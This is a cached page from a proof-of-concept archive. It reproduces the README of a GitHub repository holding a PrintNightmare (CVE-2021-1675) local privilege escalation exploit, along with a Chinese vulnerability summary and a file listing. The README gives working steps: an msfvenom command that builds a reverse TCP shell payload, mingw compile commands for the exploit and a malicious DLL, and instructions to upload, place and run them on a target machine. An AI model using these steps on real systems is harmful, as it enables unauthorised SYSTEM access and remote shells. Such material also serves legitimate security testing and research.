Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-1675 PoC — Microsoft Windows Print Spooler Components 安全漏洞

Source
https://github.com/AndrewTrube/CVE-2021-1675
Associated Vulnerability
Title:Microsoft Windows Print Spooler Components 安全漏洞 (CVE-2021-1675)
Description:Microsoft Windows Print Spooler Components是美国微软(Microsoft)公司的一个打印后台处理程序组件。 Microsoft Windows Print Spooler Components存在安全漏洞。以下产品和版本受到影响:Windows 10 Version 1809 for 32-bit Systems,Windows 10 Version 1809 for x64-based Systems,Windows 10 Version 1809 for AR
Description
PrintNightmare Local Privilege Escalation
Readme
# PrintNightmare Local Privilege Escalation PoC 

 src/nightmare.cpp: source code to exploit CVE-2021-1675 and gain system access
                    by installing a malicious dll                   
 src/payload-dll.cpp: source code for dll with malicious shellcode in entry function
 
 **!!Only use against servers on which you have permission to test**
 
## Summary
CVE-2021-1675 is a vulnerability in the Print Spooler Service of Microsoft Windows
which allows an attacker to bypass the SeLoadDriverPrivilege check. This can be
leveraged to gain privilege escalation on the target machine by installing a 
malicious DLL which calls shellcode or uses the Window API to establish a reverse
shell connection. Versions of Windows 10/8/Server 2008/Server 2012 before June
8th, 2021 are affected.

## POC
1. Download or clone git repo
2. Use msfvenom to generate a suitable payload in c
   `$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f c`
3. Paste the output of msfvenom into payload-dll.cpp where it says to 'change me'
4. Compile the main executable
   `x86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp`
   `x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspool`
5. Compile the dll
   `x86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -shared`
6. Archive the exe and dll, then find a way to upload the archive to your target machine
   `zip ./bin/PrinterNightmareLPE.exe ./lib/ `
7. Once the archive is on the target Windows machine, extract it
8. Move evil.dll to c:\windows\temp\evil.dll
9. Run the PrintNightmareLPE.exe

## Notes
* If everything is working properly the exploit should iterate through the Windows' printer drivers and print out the results
* You can change the filepath PrintNightmareLPE.exe loads the evil.dll from inside the source code
* currently the malicous dll just loads calc.exe as Proof-of-Concept
File Snapshot

 [4.0K]  /data/pocs/3336423e9a7099b4c5cc970b8f115237a5c2350a
├── [4.0K]  bin
│   └── [2.3M]  PrintNightmareLPE.exe
├── [4.0K]  lib
│   └── [ 91K]  evil.dll
├── [2.0K]  README.md
└── [4.0K]  src
    ├── [4.9K]  nightmare.cpp
    ├── [ 25K]  nightmare.o
    ├── [1.6K]  payload-dll.cpp
    └── [ 571]  template-offensive-dll.cpp

3 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.